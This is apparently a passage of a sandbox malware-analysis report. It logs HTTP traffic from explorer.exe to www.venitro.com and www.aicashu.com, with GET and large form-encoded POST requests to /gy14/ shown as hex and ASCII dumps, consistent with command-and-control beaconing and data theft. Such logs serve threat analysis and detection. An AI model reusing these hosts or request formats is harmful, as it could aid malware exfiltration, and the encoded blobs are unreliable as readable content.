                                May 27, 2024 08:43:15.690023899 CEST2472OUTData Raw: 75 46 7a 61 37 4f 69 58 58 51 34 69 4d 35 39 46 58 78 73 39 5a 35 4b 7a 58 4a 63 6c 70 49 4b 69 45 36 44 39 45 59 58 64 76 49 6a 46 72 63 72 43 4b 72 6c 70 36 6a 4d 75 35 4b 7e 77 37 6e 72 4f 4a 4f 74 36 34 4d 57 5a 48 42 38 45 51 65 41 31 55 53
                                Data Ascii: uFza7OiXXQ4iM59FXxs9Z5KzXJclpIKiE6D9EYXdvIjFrcrCKrlp6jMu5K~w7nrOJOt64MWZHB8EQeA1USFFZmsJDLVPCZX2LxI6gZpaf3TZiMvfK5ApSQOVIGMB1VNSFo6xKNcma7PMkKi2bqf4E8DHTSVKOPSiTaozPKlbf_ZJZIxboLcgHEapREg8NVdIiv7XetQKsj8mKkliAwBZ4QttCNPqp2HRX_G9UvjnztVYE5TjeLj
                                May 27, 2024 08:43:15.690052986 CEST2472OUTData Raw: 64 50 66 6d 37 50 35 43 59 43 33 42 4f 62 69 6c 6b 43 45 79 75 31 4c 42 59 65 50 79 55 6f 66 67 77 50 73 76 69 41 58 55 72 48 45 66 64 37 4d 6f 71 6a 67 68 78 4e 38 71 58 68 32 58 78 76 4e 4b 76 43 71 55 70 47 74 4a 44 57 6b 44 53 6b 70 4f 51 30
                                Data Ascii: dPfm7P5CYC3BObilkCEyu1LBYePyUofgwPsviAXUrHEfd7MoqjghxN8qXh2XxvNKvCqUpGtJDWkDSkpOQ0srASZd6wRCUK3CAwqK~LLj59lWGuglO1Vc14B0saqhPx8Tqjv98j8DNwQf1yYi166uri~VspAnBFhl4cBNLVc01HgARjBQDfVIVF8Fq1hAopmikIWpIW1H5Xqg1CtMT9AN77y2wJemzVBEWr8ZHN9hnHs34Suwt02
                                May 27, 2024 08:43:15.690088034 CEST2472OUTData Raw: 6e 75 39 4e 58 65 69 4b 77 2d 33 6d 73 35 5a 2d 33 67 42 6d 6d 52 55 66 43 47 7a 6e 46 6e 37 44 57 65 44 59 53 7a 5a 77 37 48 4d 50 4a 44 43 64 6f 30 53 59 77 56 68 57 32 56 53 55 4b 31 4e 4b 51 48 31 57 4e 4b 32 49 44 34 43 75 49 48 4e 67 4b 4e
                                Data Ascii: nu9NXeiKw-3ms5Z-3gBmmRUfCGznFn7DWeDYSzZw7HMPJDCdo0SYwVhW2VSUK1NKQH1WNK2ID4CuIHNgKNIPsffgautR8CR98ITEKlnN8H1UxmOPLww-hUNo5xvf2PmzjJ1JVIAsjvK37Fuv5LVpr8BVMB8_vAnJo7EEnvX24XfFgpli8gXORdkTmIvXgY9bm4n27d6jykYDPGchTViBtlKAYSCcwXEokYio8g0ETdaczG(4dQ1
                                May 27, 2024 08:43:15.690180063 CEST2472OUTData Raw: 62 65 62 70 35 6b 38 51 72 67 34 75 72 6a 52 71 4e 4d 59 48 47 77 53 48 36 64 36 49 50 56 43 65 50 50 75 6f 4a 76 44 57 6c 36 52 4f 4a 53 38 57 79 74 4c 6e 62 34 28 4c 61 65 59 55 42 50 6c 36 6a 6f 43 4f 30 63 32 56 79 47 30 39 44 52 58 64 6e 4e
                                Data Ascii: bebp5k8Qrg4urjRqNMYHGwSH6d6IPVCePPuoJvDWl6ROJS8WytLnb4(LaeYUBPl6joCO0c2VyG09DRXdnNtOLytwFy8bBU5i0GUm11sUNok-qoetlcW-6Q~ltJD8rtjv~Jk_83W2JsrytDZ0KhGHBh~ib3bJbIoFQQllJVck1eL3fCJpL_smJzbjUngmq18XY7IZ8d~lzGDp0oDM3gWnMBlSEta7QcAvBJMBpGBpvzdNbQHQ9lH
                                May 27, 2024 08:43:15.694513083 CEST2472OUTData Raw: 45 36 4d 4f 49 7a 4b 6e 79 62 39 77 6d 66 50 61 4a 30 6c 42 51 38 5a 70 6b 56 47 64 58 69 68 54 4a 59 69 5f 55 50 44 54 63 50 74 53 34 4c 4b 39 63 72 28 72 34 49 42 48 71 49 61 52 49 74 58 42 58 7a 49 49 4e 66 34 64 46 72 7a 4b 45 50 34 43 73 43
                                Data Ascii: E6MOIzKnyb9wmfPaJ0lBQ8ZpkVGdXihTJYi_UPDTcPtS4LK9cr(r4IBHqIaRItXBXzIINf4dFrzKEP4CsCTR9ZDKuKt_58r_hveeQRs65ORO(2Pjmso0mC~uP8E8r9j5XbWhOZzghwJWET~RJ36FPdzS~rvIRswcRfd6LR3uSBb7gYuvJL7s59GTu2gtk4Us7Z15qGytln8HawwybfLa7QkEf5h3TQph85f_BNJLdCEZ27~nPBx


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.4498493.33.130.190802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:44:12.485707045 CEST158OUTGET /gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR HTTP/1.1
                                Host: www.venitro.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                May 27, 2024 08:44:13.061531067 CEST340INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Mon, 27 May 2024 06:44:12 GMT
                                Content-Type: text/html
                                Content-Length: 200
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 49 50 4e 6a 3d 69 6c 52 71 73 43 31 67 33 61 55 45 4a 48 6b 61 38 4a 6d 61 33 6c 71 46 35 57 73 41 62 59 2b 63 54 48 35 44 4d 78 51 77 7a 35 4c 4f 64 6f 57 6b 34 4c 77 58 35 4a 66 68 55 6b 62 37 79 6f 6b 58 31 4f 55 68 26 33 66 3d 5f 6a 41 50 5a 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR"}</script></head></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.4498503.33.130.190802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:44:13.066353083 CEST12360OUTPOST /gy14/ HTTP/1.1
                                Host: www.venitro.com
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.venitro.com
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.venitro.com/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Data Raw: 34 68 49 50 4e 6a 3d 71 48 64 51 79 6e 35 4b 76 65 49 33 65 6e 39 50 38 38 7a 68 71 69 71 61 35 32 52 63 52 4c 4b 63 4b 51 59 33 51 44 38 62 67 35 37 76 4d 63 43 37 38 59 77 43 35 65 53 76 4c 6b 4b 6b 72 4a 6c 31 38 76 74 6d 4d 64 4c 35 44 59 70 4a 44 41 79 65 41 45 78 31 43 5a 78 2d 44 4d 38 72 7a 31 71 70 4e 65 33 43 6c 65 79 46 53 68 49 33 72 70 7e 34 41 6b 64 61 45 36 62 61 51 35 63 4f 69 41 79 34 57 55 69 31 59 73 74 4a 57 6e 63 62 31 6b 74 42 65 6b 71 5f 33 34 50 66 58 78 68 35 6d 2d 5a 6e 33 54 4f 54 55 38 46 71 79 36 61 56 79 56 34 4a 57 4f 61 75 71 41 56 42 46 45 77 41 53 31 61 44 74 53 65 65 43 32 36 44 36 6c 79 30 47 68 34 65 62 34 6c 61 61 79 42 41 33 58 79 4f 52 6a 56 78 4f 75 35 66 50 75 53 41 59 33 72 52 73 4a 5a 65 55 54 74 54 45 65 56 5a 72 4e 31 47 38 6d 6a 54 55 37 78 6f 38 5f 4a 6f 5a 32 35 33 59 56 76 70 37 57 6e 67 71 4f 65 74 7e 69 52 38 7e 51 62 34 6d 35 30 65 52 69 52 62 43 6f 53 45 65 33 35 53 52 76 58 38 43 4a 71 32 33 74 35 2d 56 4b 79 4b 67 55 53 47 4c 41 71 36 49 42 30 [TRUNCATED]
                                Data Ascii: 4hIPNj=qHdQyn5KveI3en9P88zhqiqa52RcRLKcKQY3QD8bg57vMcC78YwC5eSvLkKkrJl18vtmMdL5DYpJDAyeAEx1CZx-DM8rz1qpNe3CleyFShI3rp~4AkdaE6baQ5cOiAy4WUi1YstJWncb1ktBekq_34PfXxh5m-Zn3TOTU8Fqy6aVyV4JWOauqAVBFEwAS1aDtSeeC26D6ly0Gh4eb4laayBA3XyORjVxOu5fPuSAY3rRsJZeUTtTEeVZrN1G8mjTU7xo8_JoZ253YVvp7WngqOet~iR8~Qb4m50eRiRbCoSEe35SRvX8CJq23t5-VKyKgUSGLAq6IB0ty9wtPNj-z4x2EbdzSM6_1m7km2(Zf2UPMhupxyFmLZv2kNpNH2NAWJzNtjUbK_o_HsgG~Ax7x9HMvPuhM-SdZZujVVyKI7mNdl1lDghLwXPWrueTg99HyR5n~mWuUQDbTZkyWzIZbchOrFm4Ern7eCuPC0HO32GzYyK5~wDf9kd-NaG55zLybO0fGJfbBoT-Ok2Udh5o4miL9e(k12SjLeWxE16LAGlXMTX7dv~wxG2SO0pGUqsKcHeQLHHvojyR~Cqd1LQX2WIZpCHcwIqxUWt1A_3Wgag_pt8NxBVJTLy-YRSOEwMj18KAX6DFNYQTNZXoff3D(e(7RQLA01gXItwAKXnvOV6XO0QkMDDqYYJ2VErHrq3vzBwC86y15LO3FyWbK1qPfsxv6eBdDnZNDEUadQqE4-Y35IMLBhK_jwiJ3WL-6JFjm9OqtyJIWtj4bgljPr8cTNdhnJ32Y8y_GPugZWgQvfrhsltzeVeLL8dq70DtcdZO5Rp679B_d5V7IEygUBav(h2-NqFax01_3Mvwln2S3NaAWYmz0SL-~DcHKBuNNBxS7ERtsBQMv-AusmJ7QMdypKc_(Gp7CStwIHEW1FpkCs~abvBCiCJXffmcoHvCSJULLaq4qQipqvMma3DksBjren~EJ6KtsqnWwvxnOqhbj2RZ4 [TRUNCATED]
                                May 27, 2024 08:44:13.075016022 CEST9888OUTData Raw: 5f 6d 57 34 38 67 70 45 4f 31 78 6c 61 39 6f 4a 50 70 45 65 36 7e 71 37 59 33 5f 38 53 63 49 7a 52 37 68 7e 6b 69 52 59 63 30 2d 6f 52 50 50 65 35 46 78 41 76 76 4e 69 57 70 61 4e 5f 64 6f 74 6c 6a 66 72 42 30 43 6a 4b 66 59 31 61 62 53 76 50 4f
                                Data Ascii: _mW48gpEO1xla9oJPpEe6~q7Y3_8ScIzR7h~kiRYc0-oRPPe5FxAvvNiWpaN_dotljfrB0CjKfY1abSvPODZXCSwpy5Cj3u2D56jXu2pgqlMONTpJhEc2XioPLrJOiNSvxiXvYEyQYgJ3GRsmW3wQDF8-JUNqnWYlgiZML0R1Z7q_0p2FGmuj~qCNnXfliOwsoQ1ZlIN2G1(ZGj8UJNIF8Fc6fDsMgOeCwZkDRMwYjMbW3j6-00
                                May 27, 2024 08:44:13.076478004 CEST2472OUTData Raw: 62 37 49 7a 6d 52 4e 4c 56 67 61 42 79 68 42 69 4c 69 2d 77 5a 4d 6c 35 72 5a 36 39 50 34 52 28 4f 34 5a 77 78 36 79 32 36 6e 49 43 4a 68 55 39 49 78 4e 5a 4e 63 63 48 46 79 72 39 74 79 30 6a 45 71 34 50 32 39 64 66 4c 74 54 71 61 61 5a 63 55 6e
                                Data Ascii: b7IzmRNLVgaByhBiLi-wZMl5rZ69P4R(O4Zwx6y26nICJhU9IxNZNccHFyr9ty0jEq4P29dfLtTqaaZcUnJ13A5YQmEehlQ7yIopVC9~0e5Vio_IBq_iu5pobrxAAJrfyEwoiyH~5KJFzA8OPOzSx3ZWHjznkkZOaS0DQ7ENyrOnEtgfV0DH6em5dIOBHtireJwr-~u(vrmwtWkW-drzdhSu9EWFOsX3IDgdu0MYJMjkYsgVWcv
                                May 27, 2024 08:44:13.076518059 CEST4944OUTData Raw: 6a 75 51 43 62 28 46 6c 72 74 64 33 70 76 4d 34 43 49 74 76 61 38 39 53 5f 49 6c 38 5a 55 48 39 74 75 5f 66 6f 50 63 34 79 4b 2d 6b 62 5a 4c 30 4a 44 44 78 43 76 33 66 5f 66 61 73 30 55 6f 54 66 76 7a 7a 41 28 2d 57 48 32 73 49 37 38 38 6f 45 6b
                                Data Ascii: juQCb(Flrtd3pvM4CItva89S_Il8ZUH9tu_foPc4yK-kbZL0JDDxCv3f_fas0UoTfvzzA(-WH2sI788oEk6AU2Lg9t0xZfZct4gps4hWOm-AdqlKTk_xOC1pzFq~9hP059sLT84~_sy5NEVTGEeXbjYCV6yLZvDN4XVCqBbqlaQAzyPKHvqmh53QQsD6v1NQqGZ9SiTpsk0G2BdgEXIc4J9EenCFj8Y98oj6lCaVry2ggiJd79T
                                May 27, 2024 08:44:13.076651096 CEST7416OUTData Raw: 6a 4d 2d 35 33 68 31 71 46 79 64 79 5f 39 4a 72 35 79 67 6a 62 42 7a 6e 38 48 4d 74 69 72 36 35 57 74 30 6a 30 39 2d 69 70 32 43 70 6e 62 43 32 42 37 38 6c 45 30 47 6c 6f 47 64 6c 52 77 59 76 31 58 61 34 77 64 34 48 65 49 38 57 4d 4d 42 67 59 32
                                Data Ascii: jM-53h1qFydy_9Jr5ygjbBzn8HMtir65Wt0j09-ip2CpnbC2B78lE0GloGdlRwYv1Xa4wd4HeI8WMMBgY24KAbWs1bJqngi42Pww8LoFEOjLJK3Bz4rcW(jHV7n~GWQhhy0xfsqf2jdrx2KAjdMy1J-XPApEkxaYkCccAWjNmmQtphUOhFJ7LodCdnavZvuDyo2wzln7s0y~y3isuh4rsp1ftgcxfMGznrV(yPvddob0w3W6ftw
                                May 27, 2024 08:44:13.080226898 CEST4944OUTData Raw: 72 31 42 76 6c 5a 61 37 5a 48 71 46 31 78 79 45 34 65 61 50 49 6b 66 62 38 43 68 37 32 6d 39 7a 31 62 58 7a 57 50 59 72 73 6e 32 7a 64 6d 55 31 5a 35 50 41 5a 35 38 42 65 30 46 73 4e 79 55 79 42 51 36 64 67 6a 4b 38 52 47 70 61 37 6f 67 45 50 36
                                Data Ascii: r1BvlZa7ZHqF1xyE4eaPIkfb8Ch72m9z1bXzWPYrsn2zdmU1Z5PAZ58Be0FsNyUyBQ6dgjK8RGpa7ogEP6OE4ju4U1rSslvzWZ4ShLLIQXlNBpssecQdF6zBtYvIatBLyNoLfTZvGPMwL8b6iMwR9ojqJ9Xe_agDqXTwcwYSzfiV76utguVxs35Jz6tgto_CtyCVTVt3OpvA3I7qapylZ28EOTaTPIdor(uD2(2RtEI2jwbeOXb
                                May 27, 2024 08:44:13.080272913 CEST2472OUTData Raw: 6a 55 6a 72 36 64 30 32 57 52 6a 4c 45 77 31 36 73 4e 35 58 46 70 2d 6f 31 50 48 6e 4a 41 31 53 36 7e 53 53 41 6d 67 5a 6c 7a 53 63 7a 63 56 64 6c 74 2d 47 37 79 4b 70 4f 6d 35 59 75 53 2d 77 69 30 57 65 51 4a 68 76 49 4f 65 39 79 69 52 41 42 4d
                                Data Ascii: jUjr6d02WRjLEw16sN5XFp-o1PHnJA1S6~SSAmgZlzSczcVdlt-G7yKpOm5YuS-wi0WeQJhvIOe9yiRABMRyKqYsDOzwqdcQ2mwGUuV(g~mcNoozDOQGZFiAIm7R6Cf(Z2W3Phij09lEzUKpAxZPc45GHdVPpsgWuG7IDAV4tT0GUSvui5yeBheoC6xg9lfg3X5ZvNzuhaky2fABAlh3j~MWGw-nFv90kBj63Z66wDVEZxnj5Xk
                                May 27, 2024 08:44:13.081603050 CEST7416OUTData Raw: 4d 61 4f 78 34 53 65 53 6d 61 65 66 58 37 69 41 38 53 36 73 66 6f 41 39 65 63 56 67 45 57 64 41 64 66 64 5a 72 6a 5a 6d 6b 4c 53 58 33 66 35 66 2d 6f 48 50 48 61 53 63 30 65 45 59 79 49 56 51 68 56 4d 41 7a 50 50 64 46 7a 6a 41 4b 7a 6d 53 6b 34
                                Data Ascii: MaOx4SeSmaefX7iA8S6sfoA9ecVgEWdAdfdZrjZmkLSX3f5f-oHPHaSc0eEYyIVQhVMAzPPdFzjAKzmSk4T(u~SdkiGwxajLtLnrXMvXH~V3FthdFoOy9SfFDRzsdhI~47ehNB-KaGcflUzp7p9Qqv74SEwHajcDH5kl3otawjduk~g3x9P2w3qcPlu4Q~pkY~DWi6fnGL43Ug6JVfsQB~eoI4xCpIKzeGGLigyiQ80UWoCApzF
                                May 27, 2024 08:44:13.123123884 CEST34608OUTData Raw: 58 4f 64 31 4e 62 6c 5a 6c 42 59 49 76 72 6d 7a 73 50 43 47 4a 36 32 30 76 58 45 72 31 58 6c 54 31 55 62 54 5f 71 34 73 30 47 73 4b 50 47 50 37 55 69 74 31 31 28 71 59 32 73 51 62 55 79 48 38 52 48 43 47 52 6a 6f 6c 72 4d 30 76 47 31 44 6e 35 4c
                                Data Ascii: XOd1NblZlBYIvrmzsPCGJ620vXEr1XlT1UbT_q4s0GsKPGP7Uit11(qY2sQbUyH8RHCGRjolrM0vG1Dn5LFp5IhqLMpykjILHOA9sZrRCJSRwpwZeO0jZkuiflWCs59iDoN7OtfZUmjgEbW7gh3EbMvihc518WPGKP2HtoXfgSc8oCY2PTneevvk78LbX~fMG0acBxCwDd5~y6-ADV_asVyqaqBV5ckeuOzspA87W0rvOKAWXwr
                                May 27, 2024 08:44:13.174503088 CEST1236OUTData Raw: 43 6a 55 36 6f 55 66 74 70 63 34 46 70 38 2d 35 5f 28 74 49 6e 65 6e 76 56 77 75 46 65 66 62 59 57 5a 78 42 78 39 51 7a 64 65 53 6f 47 47 69 41 73 48 4f 62 47 45 44 4a 46 6a 4e 46 70 74 79 30 48 65 44 4e 4d 49 4d 62 4c 45 34 49 71 37 34 6c 61 54
                                Data Ascii: CjU6oUftpc4Fp8-5_(tInenvVwuFefbYWZxBx9QzdeSoGGiAsHObGEDJFjNFpty0HeDNMIMbLE4Iq74laTD7AwzfaoZIWUyXFEOXOwsmeW-r2NmMKpfr4n1LtZeAoMax-C5ezhxxtRoIm4l1ae0h65UQxURQ7cLjATO2xC_HRT74HRYGuRMT0~uu5EJtSXH7pz9JMdOHCHze_vvaiWSXc7L9XsR2W7IgL1avdUTqunn~Y9LkjW_
                                May 27, 2024 08:44:13.222959042 CEST1236OUTData Raw: 36 54 55 79 32 74 38 75 5f 73 51 78 38 51 46 46 5f 51 78 70 7a 55 55 73 4e 57 6a 56 6c 28 67 50 6a 43 7a 6e 44 31 79 64 76 6d 57 6e 6e 54 56 69 76 64 6e 54 41 34 57 55 77 7e 34 35 46 38 49 66 52 28 49 4a 76 50 48 41 50 35 43 47 51 45 50 66 72 47
                                Data Ascii: 6TUy2t8u_sQx8QFF_QxpzUUsNWjVl(gPjCznD1ydvmWnnTVivdnTA4WUw~45F8IfR(IJvPHAP5CGQEPfrGCx0BHXFkr7j9t1KieesA4bCxW4caiCGDROTJSQMOB72zfjGk1j8imtp1KbPeiIQMjtqy-kUT3Z_KNk59qiBUbxBXz1n6cAOKlJjQIWkC1MXbWwdlV6QpvsYUF4P0GxeS5GZK_2uHWoUhPwCXR9twh1VtP0XH6XtL_


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.44985138.174.75.236802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:44:54.353420019 CEST158OUTGET /gy14/?4hIPNj=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&3f=_jAPZR HTTP/1.1
                                Host: www.aicashu.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.44985238.174.75.236802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:44:54.870484114 CEST12360OUTPOST /gy14/ HTTP/1.1
                                Host: www.aicashu.com
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.aicashu.com
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.aicashu.com/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Data Raw: 34 68 49 50 4e 6a 3d 76 48 43 56 4a 45 7a 73 63 73 50 57 62 66 6f 79 42 58 50 43 65 72 56 4e 37 50 72 77 63 6f 33 49 4b 7a 68 50 6c 4a 68 72 57 37 52 63 4a 5f 79 4d 48 61 52 5a 7e 46 58 68 42 43 6d 75 62 72 77 38 33 39 47 4f 71 44 7a 39 55 41 75 47 46 73 54 58 37 56 4e 31 57 38 4b 55 43 72 6c 38 5a 62 48 48 5a 54 48 35 78 58 37 78 79 31 38 51 69 39 28 7a 74 50 72 43 59 71 7a 36 78 56 32 34 44 75 6a 41 77 4c 61 38 4c 5f 34 63 45 71 58 4e 4b 74 76 32 42 4b 43 6f 44 79 5a 62 31 4f 6d 75 31 54 36 41 35 68 6c 70 73 4e 69 67 38 42 74 59 4d 37 49 62 33 77 74 6c 68 4b 36 76 32 68 37 55 30 48 51 4e 58 61 5a 43 64 53 7a 76 66 70 38 7a 37 5f 6f 72 6f 44 6a 72 6f 31 4c 33 6c 67 6c 79 30 6a 52 63 75 77 78 47 78 4b 76 45 5a 34 42 33 64 68 72 4d 31 4c 5a 34 51 48 61 6f 42 78 35 50 54 69 57 32 48 72 6a 59 46 73 47 44 58 68 33 2d 72 54 64 5a 43 45 4b 6d 37 48 36 49 71 55 47 36 56 7a 6d 54 69 69 4a 4f 76 37 54 37 4b 57 73 74 30 4b 76 64 4f 49 66 6b 30 54 38 75 34 5f 32 66 46 66 52 61 7e 51 46 50 44 74 31 62 75 41 64 [TRUNCATED]
                                Data Ascii: 4hIPNj=vHCVJEzscsPWbfoyBXPCerVN7Prwco3IKzhPlJhrW7RcJ_yMHaRZ~FXhBCmubrw839GOqDz9UAuGFsTX7VN1W8KUCrl8ZbHHZTH5xX7xy18Qi9(ztPrCYqz6xV24DujAwLa8L_4cEqXNKtv2BKCoDyZb1Omu1T6A5hlpsNig8BtYM7Ib3wtlhK6v2h7U0HQNXaZCdSzvfp8z7_oroDjro1L3lgly0jRcuwxGxKvEZ4B3dhrM1LZ4QHaoBx5PTiW2HrjYFsGDXh3-rTdZCEKm7H6IqUG6VzmTiiJOv7T7KWst0KvdOIfk0T8u4_2fFfRa~QFPDt1buAdiIuARvMiJMBAXk7to(lkaUgvnLtF0Z-NIvSvie7U2ctcjUGjlCto-npUREdVwYanvDU00v4TbXTLI38rGX5Ab2H5NnO8OJjWZRPFN(q3ae1Ha0ruHyn(N308u6NlQWMV9bLjVh2~66tZKxnYCRYl2t1ylbnBo~OWgxUVzWLNdRtcw(3VkzaPypnLBCUZrac5EzU0wsgFvpTmCupLoCV3aB0(wHX9kRWg96rsulk6XN6tN~KtB74g0cr6V3FwXMHe3Fa6pT_LON32aNV2wj-FRVnHTFOGGAqd9SJZ07QBBrZYe9IA8nf1fmjpOoSfGyZSoEpMll2wY23e06jb8SdqCC3Z2TdZ447up47voyuZIjJ3E8R7OoQG6osvOAdqftLZ5JhMHSOB_tuG_2qrb45YDLqX6f88ZGbpo8YvrZI1wg19MMR7QCBYbVwSRbaW6E_AkCeMEMX4yVgvMPtB-8Ld9FejRAfPk2uOMM1IDlSeewtEej8HFb-AMsRGWvy0CZHnRsbg-LWDSmA~VGuQLmYgea0O5n_UeQfW-(iDdu-QTEFZItnS9fwJdS0KwK_gtBZ4gmU6VsPx14MHj00DcmVRyNYq6~aQspqPu4DpsCdHZxRR0bRvCtLgRaAwL0i9x3XiroKlUrj8GcUxPe_yEnU35i5HZblhre9BBG [TRUNCATED]
                                May 27, 2024 08:44:54.875828981 CEST7416OUTData Raw: 48 4f 70 6a 33 5a 37 4f 35 28 5f 32 6b 71 47 69 67 52 31 48 39 31 2d 6c 6b 36 47 33 4c 38 4b 66 7a 32 53 31 6f 45 42 58 4d 52 5a 71 72 42 6f 35 68 7e 34 32 75 54 47 38 47 4e 45 37 65 62 6f 38 32 28 63 51 50 4e 61 48 53 45 70 4d 51 46 30 28 63 73
                                Data Ascii: HOpj3Z7O5(_2kqGigR1H91-lk6G3L8Kfz2S1oEBXMRZqrBo5h~42uTG8GNE7ebo82(cQPNaHSEpMQF0(csy43uDLS0A1uFSX12P3PwamjtGxgKSI90Vb9FHPS5mYVfX2CMeAPSYjNtHG7i2oyhy0zI9tRBeY8y0BkmcOJ2I06FgO7D6ZM28Gza1iSIU8ovNTnTtDPa2l7OhcP(I0IwtYWV1D0Ma1HfDkjzRkA6G5t1oRwyCAENm
                                May 27, 2024 08:44:54.876055956 CEST4944OUTData Raw: 53 44 64 34 30 61 67 44 72 6c 37 45 79 65 69 62 31 35 52 46 4f 30 53 7e 47 4d 63 42 68 77 6a 71 71 69 39 77 52 52 42 72 41 48 53 71 36 4e 6e 33 76 78 49 4c 4c 35 7a 50 4f 39 7a 28 49 64 34 75 78 46 41 72 67 38 54 76 71 4b 64 73 71 4a 66 58 36 69
                                Data Ascii: SDd40agDrl7Eyeib15RFO0S~GMcBhwjqqi9wRRBrAHSq6Nn3vxILL5zPO9z(Id4uxFArg8TvqKdsqJfX6iXRbXldWUA(9(DGrJ5rBXarilAZy(CXDb13pm_C4MiNgwLo-Fz9T6GHueQkmjhuajRv9j1M9aGJ3rhysgb7KJHZUNRTdrXJKo1hhtyxYpo6DcOMCLUg0XDXQ8g(Rd1NmkZuxeOBTLAvrH5crlfHAgrg2Tu~l0yvMSU
                                May 27, 2024 08:44:54.880609035 CEST9888OUTData Raw: 30 65 62 79 43 45 6d 28 59 75 4a 53 4c 7a 43 4a 4f 75 71 4b 61 52 73 32 70 6e 30 76 2d 63 50 57 6d 64 64 78 52 42 37 72 34 6a 41 62 61 31 64 4b 56 36 76 61 65 50 56 35 6f 66 30 51 33 6d 70 57 30 63 51 75 78 61 56 4d 31 69 77 41 63 43 38 6d 59 66
                                Data Ascii: 0ebyCEm(YuJSLzCJOuqKaRs2pn0v-cPWmddxRB7r4jAba1dKV6vaePV5of0Q3mpW0cQuxaVM1iwAcC8mYfBgxtGr5(WZGOmiYXrDdpBCCnj(UHCZyFz93Y9x_kHdC5QMMGUhrzxr1nR2GQ-gbCcXaNTIhYcbssy(q2F9Rxx2VATuZ0H0p06TiKX75flU6oyALSGYz87(EAwdu04df7TwB5Ndhrc3lDx4n3FP4lJQ984OdElRVlj
                                May 27, 2024 08:44:54.880836964 CEST4944OUTData Raw: 32 6c 39 33 6a 67 77 58 6c 6e 5a 46 34 66 64 4a 55 37 47 32 35 32 66 63 56 58 43 69 38 6c 50 36 7a 65 34 6c 73 50 32 4c 5f 47 75 37 55 51 46 78 62 53 4f 49 6e 41 72 47 67 4c 6c 43 6c 47 35 62 45 53 4c 63 6a 67 77 71 62 31 45 4e 38 67 74 72 38 42
                                Data Ascii: 2l93jgwXlnZF4fdJU7G252fcVXCi8lP6ze4lsP2L_Gu7UQFxbSOInArGgLlClG5bESLcjgwqb1EN8gtr8Bp54QYy89AQxJwAzzeTUgiEljk6sJtL-VxZFQvrErDkikvktvyTa9S7PfNm9bdJvn5~nh9Fe(vC5mlGJ3stHQR0B~0(J1JDiRdArWkYaHx~19C6B0ta5C2Vtm1L_HP5EAVoMS5dnuQfkP7JCwV0_4YDAxhRnaDYjdX
                                May 27, 2024 08:44:54.881021976 CEST4944OUTData Raw: 50 55 45 6f 74 44 5a 57 4f 43 45 5a 41 4d 51 59 4d 78 6e 37 50 46 44 5a 38 7e 31 66 75 65 47 4c 54 44 79 73 4f 6a 4d 33 37 71 4c 69 31 31 30 38 38 61 74 75 50 75 38 34 50 37 63 51 30 41 4e 33 69 6b 73 28 61 71 62 64 6a 50 7a 4a 37 72 30 7e 49 32
                                Data Ascii: PUEotDZWOCEZAMQYMxn7PFDZ8~1fueGLTDysOjM37qLi11088atuPu84P7cQ0AN3iks(aqbdjPzJ7r0~I2DUszeLhvN52emB2wUkk1MaVrQgVHLAeyGKhF8KKKx2ZvuxLNoM7SMaKyvinTD(ZV0qi3KvOpmpwg9LpKaNg2Mb7gjah9Be-ViLyv-MSUg04HolSHh4RoQejMgum~lUxhs(G3HuxECRu3WzreRitO_vxy73jseEKby
                                May 27, 2024 08:44:54.887164116 CEST7416OUTData Raw: 6c 56 65 7a 62 53 68 44 39 32 39 53 6e 79 39 67 4e 77 42 4c 5a 33 75 75 50 42 2d 4d 46 7e 57 42 57 72 69 7e 37 47 66 73 63 64 43 4e 74 77 39 62 52 51 7a 52 6d 79 56 47 73 50 53 36 32 58 64 76 35 74 52 35 38 7e 58 7a 74 46 67 70 39 57 64 5a 4d 31
